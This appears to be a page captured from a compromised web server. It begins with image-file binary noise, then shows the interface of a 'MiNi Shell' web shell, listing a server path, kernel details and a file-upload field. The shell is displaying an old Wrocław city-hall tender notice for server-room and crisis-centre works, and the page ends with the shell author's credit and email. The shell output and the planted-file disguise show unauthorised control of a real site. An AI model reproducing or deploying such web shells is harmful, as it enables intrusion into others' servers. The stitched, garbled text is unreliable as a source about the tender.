JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090206/19836-N-2009.html

<p class="kh_header"><b>Wrocław: Wykonanie infrastruktury technicznej oraz robót remontowych wraz z dostawą i montażem mebli w budynku Urzędu Miejskiego Wrocławia przy ul. Strzegomskiej 148 dla pomieszczenia serwerowni o powierzchni 220 m2 oraz sali dyspozytorskiej Centrum Zarządzania Kryzysowego o powierzchni 220 m 2</b><br>
<b>Numer ogłoszenia: 19836 - 2009; data zamieszczenia: 06.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wrocław Urząd Miejski Wrocławia , pl. Nowy Targ 1/8, 50-141 Wrocław, woj. dolnośląskie, tel. 071 7779230, 7779231, faks 071 7779229.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wroclaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie infrastruktury technicznej oraz robót remontowych wraz z dostawą i montażem mebli w budynku Urzędu Miejskiego Wrocławia przy ul. Strzegomskiej 148 dla pomieszczenia serwerowni o powierzchni 220 m2 oraz sali dyspozytorskiej Centrum Zarządzania Kryzysowego o powierzchni 220 m 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. Przedmiotem zamówienia jest:
Wykonanie infrastruktury technicznej dla pomieszczenia serwerowni o powierzchni  220 m2 w oparciu o projekt opracowany przez AW-KLIMA, 51-629 Wrocław, 1-629 Wrocław, ul. Wiwulskiego 12, zatwierdzony przez Zamawiającego.
Wykonanie robót remontowych wraz z dostawą i montażem mebli dla sali dyspozytorskiej Centrum Zarządzania Kryzysowego o powierzchni 220 m2 w oparciu o projekt opracowany przez ENTE Sp. z o.o., 44-100 Gliwice, ul. Gaudiego 7, zatwierdzony przez Zamawiającego 
Wszystkie wymienione w dokumentacji technicznej materiały mogą być zastąpione przez inne równoważne (posiadające te same parametry użytkowe, funkcjonalne i techniczne co urządzenia/ materiały określone przez Zamawiającego) lecz nie gorsze. Obowiązek udowodnienia powyższego leży po stronie Wykonawcy.

B. Zakres prac obejmuje między innymi:
1)	Roboty budowlane;
2)	Roboty sanitarne (wod-kan., p-poż., wentylacyjne, klimatyzacyjne);
3)	Roboty elektryczne;
4)	Instalacje teletechniczne;
5)	Monitoring wewnętrzny i zewnętrzny;
6)	Dostawa i montaż mebli;
7)	Wykonanie dokumentacji powykonawczej na przedmiot zamówienia
a)	w formie papierowej (4 szt.) oraz elektronicznej edytowalnej np.: VISIO (2 szt.)
b)	w formie papierowej (4 szt.) oraz elektronicznej w programie pdf.

C.	Do obowiązków Wykonawcy należeć będzie również:
-	organizacja i zagospodarowanie miejsca ( terenu ) wykonywania prac,
-	zabezpieczenie terenu wykonywania prac przed dostępem osób trzecich,
-	zagospodarowanie odpadów zgodnie z Ustawą o odpadach z dnia 27.04.2001r. (Dz.U.  z 2001r. Nr 62 poz.628 z późniejszymi zmianami), 
-	wykonanie niezbędnych prób, badań i odbiorów,
-	sporządzenie planu zabezpieczenia placu budowy oraz jego organizacji
-	sporządzenie metodą szczegółową i przekazanie Zamawiającemu w dniu podpisania umowy Kosztorysu ofertowego,
-	sporządzenie i przekazanie Zamawiającemu w dniu podpisania umowy Harmonogramu rzeczowo-finansowego dla przedmiotowej inwestycji,
-	sporządzenie i przekazanie Zamawiającemu w dniu podpisania umowy Tabeli elementów rozliczeniowych,
-	Kosztorys ofertowy, harmonogram rzeczowo-finansowy oraz tabela elementów rozliczeniowych mają być zgodne  w swoim zakresie z zakresem rzeczowym dokumentacji projektowej i SIWZ oraz zgodne z zaoferowaną ceną ofertową,
-	przed przystąpieniem do prac związanych z realizacją zadania Wykonawca zobowiązany będzie do dostarczenia do Wydziału obsługi Urzędu lub osoby wskazanej w umowie, będącej koordynatorem prac z ramienia Urzędu kserokopii list osób realizujących zadanie - pracujących na terenie Urzędu, celem przekazania służbom bhp. Powyższe listy powinny jednocześnie zawierać podpisy tych osób, potwierdzające fakt zapoznania się z ryzykiem zawodowym wynikającym z wykonywania prac na terenie Urzędu (stosowne oświadczenia poszczególnych osób,
-	Wykonawca zobowiązany jest zawrzeć umowę ubezpieczenia odpowiedzialności cywilnej za szkody osobowe i rzeczowe wyrządzone przy realizacji Umowy osobom trzecim z tytułu czynów niedozwolonych, na sumę gwarancyjną nie niższą niż 5.000.000,00 zł.



D. Wizja lokalna
1	Zaleca się,  aby Wykonawca dokonał wizji lokalnej w miejscu gdzie mają być prowadzone roboty.
2.	Zamawiający umożliwia wszystkim Wykonawcom, w wyznaczonym przez siebie terminie, przeprowadzenie wizji lokalnej terenu prac. W tym celu Wykonawcy winni się zwracać do osób upoważnionych. Koszt wizji lokalnej ponosi Wykonawca.

E. Gwarancja i serwis gwarancyjny
1.	Zamawiający wymaga, aby Wykonawca udzielił gwarancji:
-	na wykonane roboty budowlane, instalacyjne minimum 36 miesięcy;
-	minimum 20-letniej gwarancji reasekuracyjnej przez producenta systemu okablowania strukturalnego, w tym na dostarczone materiały niezbędne do wykonania okablowania;
-	na zamontowane okna, drzwi i urządzenia gwarancja producenta liczona od dnia instalacji okien, drzwi i urządzeń, potwierdzonej protokołem odbioru
2.	 Udzielona gwarancja na okablowanie strukturalne obejmuje:
-	dotarcie na miejsce usterki lub awarii w czasie nie dłuższym niż 2 godziny od zgłoszenia (czas reakcji)
-	nieodpłatną naprawę uszkodzeń i awarii powstałych w okresie gwarancji w terminie max. 2 dni roboczych od momentu otrzymania faxem lub telefonicznie zgłoszeniami.

F.	Warunki płatności
Rozliczenie za wykonane roboty odbywać się będzie fakturami częściowymi, wystawionymi za zakończone elementy robót i fakturą końcową wystawioną po zakończeniu i odbiorze całości robót. Podstawą do wystawienia faktur częściowych będzie podpisane świadectwo wykonania zakończonych elementów robót, podpisane przez inspektora nadzoru i kierownika budowy, a dla faktury końcowej protokół odbioru końcowego robót podpisany przez inspektora nadzoru i kierownika budowy. Suma faktur częściowych nie może przekroczyć 80% wartości umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 32.42.40.00-1, 45.26.20.00-1, 45.33.10.00-6, 45.31.57.00-5, 45.31.00.00-3, 45.31.20.00-7, 45.31.22.00-9, 45.30.00.00-0, 45.20.00.00-9, 39.10.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 35460,00 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.	spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz:
2.	posiadają koncesję wydaną przez Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności gospodarczej zgodnej z przedmiotem zamówienia (wykonywanie sieci i instalacji teletechnicznych, komputerowych alarmowych i zabezpieczajacych oraz telewizji przemysłowej), w rozumieniu ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia (Dz. U. z 2005r. nr 145 poz. 1221 z późniejszymi zmianami),
3.	zrealizowali z należytą starannością w okresie ostatnich pięciu lat, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej dwie roboty budowlane odpowiadajace swoim rodzajem przedmiotowi zamówienia (m. in. wykonanie infrastruktury technicznej dla Centrum przetwarzania danych wraz z pracami remontowymi), na kwotę o wartości nie mniejszej niż 5.000.000,00 zł brutto każda,
4.	zrealizowali z należytą starannością w okresie ostatnich pięciu lat, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną w zakresie której było wykonanie okablowania strukturalnego min. 100 ZPK,
5.	dysponują lub będą dysponować:
a)	kierownikiem budowy, który posiada uprawnienia budowlane bez ograniczen w specjalności konstrukcyjno-budowlanej, odbył co najmniej 2-letnią praktykę zawodową oraz przynależy do właściwej izby samorządu zawodowego,
b)	kierownikami robót branżowych, posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi we właściwych specjalnościach tj.: architektura, konstrukcja, sanitarna, elektryczne oraz przynależą do właściwej izby samorządu zawodowego,
c)	minimum czterema osobami do wykonania okablowania strukturalnego w tym przynajmniej jedną osobą posiadającą certyfikat producenta systemu okablowania strukturalnego, dotyczący posiadania kwalifikacji w zakresie: projektowania, nadzoru instalacji oraz kwalifikowania okablowania strukturalnego do 20-letniej gwarancji niezawodności.
6.	dysponują środkami finansowymi lub zdolnością kredytową w wysokości co najmniej 5.000.000,00 zł
7.	posiadają aktualną polisę ubezpieczeniową, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę nie mniejszą niż 5.000.000,00 zł.

Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą  spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych poniżej w pkt 1 - 7. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił. 
Niespełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do formularza oferty należy dołączyć następujące dokumenty i oświadczenia:

W formie oryginału
1. Oświadczenie, że wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust.1 ustawy oraz:


W formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę (§ 4.1 rozporządzenia w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane:
2.  Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
Uwaga: 
Odpis (zaświadczenie) musi zawierać aktualny wykaz osób uprawnionych do reprezentowania Wykonawcy. Wykonawcy, którzy dokonali zmian w zakresie organów, które nie są uwidocznione w dokumencie rejestrowym winni złożyć dokumenty potwierdzajace zmiany w składzie organu zarządzającego (np. uchwała w sprawie powołania określonej osoby)
3. Koncesja wydana przez Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności gospodarczej zgodnej z przedmiotem zamówienia,
4. Wykaz zrealizowanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o zamówienie publiczne, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej dwóch robót budowlanych odpowiadających swoim rodzajem przedmiotowi zamówienia (m. in. wykonanie infrastruktury technicznej dla Centrum przetwarzania danych wraz z pracami remontowymi), na kwotę o wartości nie mniejszej niż 5.000.000,00 zł brutto każda oraz co najmniej jednej roboty budowlanej w zakresie której było wykonanie okablowania strukturalnego min. 100 ZPK.
 Uwaga:
Zamawiający uzna warunek określony w punkcie 4 (patrz Opis warunków udziału w postępowaniu) za spełniony, jeżeli Wykonawca wykaże, że w zakresie prac określonych w punkcie 3 były realizowane prace z punktu 4 oraz wyodrębni je wraz z podaniem informacji dotyczących tych prac.
5. Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w realizacji zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych oraz doświadczenia, niezbędnych do wykonywania zamówienia a także zakresu wykonywanych przez nich czynności wraz z dokumentami potwierdzającymi posiadane uprawnienia budowlane oraz z aktualnymi zaświadczeniami o przynależności do właściwej izby samorządu zawodowego.
Uwaga: 
W przypadku osoby posiadającej certyfikat producenta systemu okablowania strukturalnego, dotyczący posiadania kwalifikacji w zakresie: projektowania, nadzoru instalacji oraz kwalifikowania okablowania strukturalnego do 20-letniej gwarancji niezawodności należy dołaczyć do oferty oświadczenie o jego posiadaniu przez daną osobę.
6. Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającą posiadanie środków finansowych lub zdolność kredytową Wykonawcy w kwocie nie mniejszej niż 5.000.000,00 zł, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
7. Polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę nie mniejszą niż 5.000.000,00 zł. 

A.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 2 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. 
B.	Dokumenty, o których mowa w pkt 2 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
C.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Postanowienia powyższego pkt B. stosuje się odpowiednio.

II. W przypadku złożenia oferty przez Wykonawców występujących wspólnie (np. konsorcjum lub spółka cywilna):
-	Oświadczenie wymienione w pkt 1, Wykonawcy mogą złożyć wspólnie na jednym dokumencie (oświadczenie podpisane przez Pełnomocnika lub przez każdego z Wykonawców odrębnie). 
-	Dokument wymieniony w pkt 2 musi być złożony odrębnie dla każdego z Wykonawców.
-	W zakresie dokumentu wymienionego w pkt 3 wystarczy, że zostanie on złożony przez jednego członka konsorcjum
-	Dokumenty wymienione w pkt 4-5 mogą być złożone wspólnie dla wszystkich Wykonawców jako jeden dokument.
-	Dokumenty wymienione w pkt 6-7 mogą być złożone przez jednego członka konsorcjum lub przez każdego odrębnie.

Doświadczenie, potencjał kadrowy i finansowy Wykonawców występujących wspólnie oceniany będzie w sposób łączny, w celu stwierdzenia czy Wykonawcy wspólnie spełniają warunki udziału w postępowaniu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wroclaw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Wrocławia - Wydział Zamówień Publicznych
al. M. Kromera 44,  51-163 Wrocław.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2009 godzina 10:00, miejsce: Urząd Miejski Wrocławia - Wydział Zamówień Publicznych
al. M. Kromera 44,  51-163 Wrocław, pokój 339a.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com